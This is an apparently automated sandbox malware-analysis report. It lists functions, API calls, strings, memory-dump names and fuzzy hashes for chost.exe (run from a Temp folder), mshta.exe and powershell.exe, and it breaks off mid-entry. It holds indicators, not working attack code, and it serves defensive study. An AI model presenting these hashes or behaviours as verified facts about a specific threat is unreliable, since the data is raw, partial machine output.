Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
API String ID: 4069847057-118859582
Opcode ID: 16f19e46741f843f224062977c097fb522a2c69793b77cb91a51971fa61da7e5
Instruction ID: a3117d2fc9fb9009d692d6e1cefe318c9bf50fe6008ed81f168f457ccbd1926b
Opcode Fuzzy Hash: 16f19e46741f843f224062977c097fb522a2c69793b77cb91a51971fa61da7e5
Instruction Fuzzy Hash: 9151B021B0C64246FB54AB15AC25BBA729DEF84B84F584035DA2D47FEFDE3CE9528310

Function 00007FF694385B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6943817D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF694381803

_get_daylight.LIBCMT ref: 00007FF694385CA4
_get_daylight.LIBCMT ref: 00007FF694385CB5

Strings

?, xrefs: 00007FF694385C35

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: df73eabb44a2f06a033e4db1e3124a7c1a8e9c46c6ef0faa36ca5ae796876bb9
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: 8041D622A1868646FB789B379485379A6B0EB90BA4F14827DEE5CC6FD5DE3CD441CB00

Function 00007FF694379084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943790B6

Part of subcall function 00007FF69437A9B8: HeapFree.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69436CC15), ref: 00007FF6943790D4

Strings

C:\Users\user\AppData\Local\Temp\chost.exe, xrefs: 00007FF6943790C2

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\chost.exe
API String ID: 3580290477-1415524421
Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction ID: 52cb32b1c6c69f5e76d711e043fd5b4d94f897f6066d3ac0390ffdf6535da869
Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction Fuzzy Hash: B2414A32A0CA12C6EB24AF3799C10B86395EF457D0B55817DE98D83B86EE3DE591C340

Function 00007FF69437CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF69437CDBF
GetLastError.KERNEL32 ref: 00007FF69437CDE1

Strings

U, xrefs: 00007FF69437CD6B

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 35f69ef713e0ad9e874611a05a42db580df1e4f5096829ef7faab30f7096ebb7
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 7B418072B18A85C1DB208F36E4943A9A7A1FB88794F548039EE8DC7B98EF3CD441D740

Function 00007FFDF6A6DBA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

SSL_SESSION_new, xrefs: 00007FFDF6A6DBED, 00007FFDF6A6DCA7
..\s\ssl\ssl_sess.c, xrefs: 00007FFDF6A6DBCF, 00007FFDF6A6DBF9, 00007FFDF6A6DCB3, 00007FFDF6A6DD03

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
API String ID: 0-402823876
Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
Instruction ID: c9a69eb65bd4123118ede14a12413605645ee072fa0ff2aa49a9d08e1c574d39
Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
Instruction Fuzzy Hash: BC31B320B09A8242EB08BB25D865BED7299FF48754F884235DA3D47BDBDE2DE5408700

Function 00007FFDF6A480D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FFDF6A4811D
SystemTimeToFileTime.KERNEL32 ref: 00007FFDF6A4812D

Strings

gfff, xrefs: 00007FFDF6A4815F

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction ID: 48711945914999802fc0b6fbfe0b6ff5df2c1325dcaadc184eebed976e1766b6
Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction Fuzzy Hash: 7D21B972B0468685DB54CF29E82077D77E8E788794F448076DA6DC7BA9DE3CD6408710

Function 00007FF69437F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF69437F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF69437F6BA

Strings

:, xrefs: 00007FF69437F67E

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction ID: 20678e9c3187e8d8ec10a93006553312da1a69d06d30a569badd41888879584a
Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction Fuzzy Hash: 5C219172A1C682C2FB309B26D4C426D63A1FB88B48F95C07DDA8D83695DF7CE945CB41

Function 00007FF69436FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF69436FE08
RaiseException.KERNEL32 ref: 00007FF69436FE49

Strings

csm, xrefs: 00007FF69436FE36

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 69f2f3c12087186f24af45d4eae6b35d6b51f5cb6cd45e42dc518d014c53c1a0
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 92112E32619B8282EB718F26F440259B7E5FB88B94F588274EB8D47769DF3CD551CB00

Function 00007FF6943807AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943807DC
GetDriveTypeW.KERNEL32 ref: 00007FF69438081C

Strings

:, xrefs: 00007FF694380805

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 881db87630076f0d7b2747036c5ec8d92c0139f5c5b3e50d5e61623f4bd89992
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 82017C3291C20786FB70AB7294A627EB3A0EF44708F81807EE55DC6791EE2CE544CA14

Function 00007FFDF6A48B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00007FFDF6A483B4), ref: 00007FFDF6A48B36
SystemTimeToFileTime.KERNEL32(?,00007FFDF6A483B4), ref: 00007FFDF6A48B46

Strings

gfff, xrefs: 00007FFDF6A48B7A

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction ID: 092c7d92e3d5a626c0a0dc267f683c59a2bbcaecfd6cf063da9406cea225dade
Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction Fuzzy Hash: 3401DBE2B14A4542DF50DB35F81155577A4F7CC784B449032E65DC7BA9EE2CD6018701

Analysis Process: mshta.exePID: 7408, Parent PID: 7288COMMON

Executed Functions

Function 00000238EAE40FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000003.2104257991.00000238EAE40000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000238EAE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_3_238eae40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: c93ace06382503432d13d17698bdbb5b9bf4868381ea0aacc4b2b0e7f7a87fc2
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: F890020489550755D81451911C4926C50446788950FD544A0681794144D85D07961252

Analysis Process: powershell.exePID: 7416, Parent PID: 7272COMMON

Executed Functions

Function 00007FFD93956475 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2140338257.00007FFD93950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8209695c07ac017324aa4d9ca3842d0812f064fed481a6552811cb7ed99c1daf
Instruction ID: c12a3136a1bd94d1435f1d95e4631622cc2081a0ebb078a13e2c84aa8dfd79f4
Opcode Fuzzy Hash: 8209695c07ac017324aa4d9ca3842d0812f064fed481a6552811cb7ed99c1daf
Instruction Fuzzy Hash: D5D13622B0EBC91FE7A5EBA848756B6BBE5EF56310B0800FED48CC70D3D919A845C351

Function 00007FFD9388B70C Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddbf23e2fb2a3025be0008b63c343d12d9e8962fa59c81402d1db2c34c3ac5d9
Instruction ID: ecb99f85c6d8fb3ac5573450c4c0f7d35dd54c66b837d8a4d6fa0ebaf5aef84a
Opcode Fuzzy Hash: ddbf23e2fb2a3025be0008b63c343d12d9e8962fa59c81402d1db2c34c3ac5d9
Instruction Fuzzy Hash: 7581793060CB884FD759EF6CC855AB57BE4EF96320F1401BED09AC71A3DA35A846CB51

Function 00007FFD9388633F Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b717eb846268a12fc69a537076ee9efa9e3a14f61805a119089a68309bd93a
Instruction ID: e004a2c5b0417684d1b273d5dea97f242ac7729a828fbb781c1ef2ddc33c363c
Opcode Fuzzy Hash: b4b717eb846268a12fc69a537076ee9efa9e3a14f61805a119089a68309bd93a
Instruction Fuzzy Hash: C5719367B0D6928FD312B7ACBC755E97F60DF5232A70801B7D298CB0D3E968544A83E1

Function 00007FFD9376ED40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2138948862.00007FFD9376D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9376D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9376d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f9800088c27e8e4263c563e3a502080237f222e392df2c26efb882b6201f52
Instruction ID: 435d93b12445201b28f645b4d4f55f3a0ccf6232b794279a054d4b7cce068338
Opcode Fuzzy Hash: 39f9800088c27e8e4263c563e3a502080237f222e392df2c26efb882b6201f52
Instruction Fuzzy Hash: 6D41247040DBC45FE7668B289C619523FF4EF53224B1902DFD088DB5A7D629A84AC7A3

Function 00007FFD9388977B Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1e79198b88e5f313fc40d7417d608126be89848fdf7addf48c1f6393db9d10
Instruction ID: be3c6564c77a4289629712e80c2906225ec524df133fe4767f3ab9797a20d06e
Opcode Fuzzy Hash: fa1e79198b88e5f313fc40d7417d608126be89848fdf7addf48c1f6393db9d10
Instruction Fuzzy Hash: 3D31B43091CB4C9FDB199B5C9C066A97BF0FB99311F00426FE449D3292CA70B855CBD2

Function 00007FFD938833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: d37d26a24dba256ab6f213e214cef65fd22488e8b4254f1bd1e5f5204f62bb1e
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: AF01A73020CB0C4FDB44EF0CE451AA6B3E0FB85320F10052DE58AC3691DA32E882CB41

Function 00007FFD93889CD8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b6c3dcc2e27ef5c70102c53c0f78f1ce8be5268cca69b9ad98c99e16bd86974
Instruction ID: a7ad461b245ea3eea94270617697978dc39505dbace056c156fd682d150d0bf1
Opcode Fuzzy Hash: 8b6c3dcc2e27ef5c70102c53c0f78f1ce8be5268cca69b9ad98c99e16bd86974
Instruction Fuzzy Hash: 43F024308086898FDB06DF288C669D97FE0FF17210B0402ABE458C70E2DB75A458CBC2

Function 00007FFD93954270 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2140338257.00007FFD93950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c6c6d51f38850b5b295c4e475ae16963c1e53341b0a139683ad1c9c59f6e878
Instruction ID: 4f8aeab93b06df4974bde12642563280499731a59ff315909efd0cc60f9fea64
Opcode Fuzzy Hash: 0c6c6d51f38850b5b295c4e475ae16963c1e53341b0a139683ad1c9c59f6e878
Instruction Fuzzy Hash: 4BF0E232B0D6048FDBA8EB8CE450AA873E0EF0532071500B6E41DDB5A7CA25EC80C740

Function 00007FFD93953FCC Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2140338257.00007FFD93950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3832195a35ec864bac7ea5a6594e052b9454044214fdadb45c7cee34cd866b91
Instruction ID: f5a0b96d94e3bc8124be9e8370ac6cf3df8e19773ed4a37a86966e45dc9e9ef7
Opcode Fuzzy Hash: 3832195a35ec864bac7ea5a6594e052b9454044214fdadb45c7cee34cd866b91
Instruction Fuzzy Hash: C6E0653170C5158FD668DA4CF445AE873E0EF443317104166D51DD7166CA22EC92C780

Non-executed Functions

Function 00007FFD93888BD3 Relevance: 7.6, Strings: 6, Instructions: 108COMMON

Download Yara Rule

Strings

N_^K, xrefs: 00007FFD93888C62
N_^N, xrefs: 00007FFD93888C6A
N_^?, xrefs: 00007FFD93888C22
N_^T, xrefs: 00007FFD93888C8A
N_^Y, xrefs: 00007FFD93888CB2
N_^@, xrefs: 00007FFD93888C2A

Memory Dump Source

Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd

Similarity

API ID:
String ID: N_^?$N_^@$N_^K$N_^N$N_^T$N_^Y
API String ID: 0-2010414532
Opcode ID: 319b4c4fdf117597eb9eb8f7e12cbd45a26e74fdd2716d7bc6bf197e8ffd1363
Instruction ID: c65ba2afff7e96ef9c8e14db0ab8d28a186a026ef0d790d07db6795f0496346a
Opcode Fuzzy Hash: 319b4c4fdf117597eb9eb8f7e12cbd45a26e74fdd2716d7bc6bf197e8ffd1363
Instruction Fuzzy Hash: 1921F367B088264BD30236BDBC25AE86795DF9437A74401B3D368CF593DC58B48787E1

Function 00007FFD938885F2 Relevance: 6.4, Strings: 5, Instructions: 131COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD93888662
N_^, xrefs: 00007FFD938885F2
N_^, xrefs: 00007FFD93888622
N_^, xrefs: 00007FFD938886C2
N_^, xrefs: 00007FFD938885C2

Memory Dump Source

Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^
API String ID: 0-2528851458
Opcode ID: c06112db0507e13e16df139322ba366c7ccd41b760008bb17600754ae58bb14a
Instruction ID: 22ef1dd95aecefec8bb56ea46720c27a06331828bd98d4e88fbaa9180ed7efce
Opcode Fuzzy Hash: c06112db0507e13e16df139322ba366c7ccd41b760008bb17600754ae58bb14a
Instruction Fuzzy Hash: 06413567E0F6D60FE7678BA81C790952FA49F1225870901FBC4F9AB0D3DE2A7C074251

Function 00007FFD938884E5 Relevance: 5.2, Strings: 4, Instructions: 159COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9388850A
N_^, xrefs: 00007FFD938885C2
N_^, xrefs: 00007FFD9388856A
N_^, xrefs: 00007FFD9388852A

Memory Dump Source

Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 0526cf93592d6e015773004f98928ca0016230a6f1249b430e9173411d25f651
Instruction ID: 3f98ea48070b3909daec0fdb52dda76748cce566cb0f1fc004f5b5d66d9608b5
Opcode Fuzzy Hash: 0526cf93592d6e015773004f98928ca0016230a6f1249b430e9173411d25f651
Instruction Fuzzy Hash: 9C418462B0E6D30FE7635BA85CB60956FA4EF1225870901F6C0B99F1D3E9297C0742A2

Analysis Process: powershell.exePID: 7320, Parent PID: 5724COMMON

Executed Functions

Function 00007FFD96384945 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004F.00000002.2291210886.00007FFD96380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_79_2_7ffd96380000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 443eeb7fa6fb45ecacbb0388913e2add407247ab497f673cf98b001699cf27f2
Instruction ID: 6d86c271e176f884d81605334afa34f22b5018d840469171499c5e60f5c8b48d
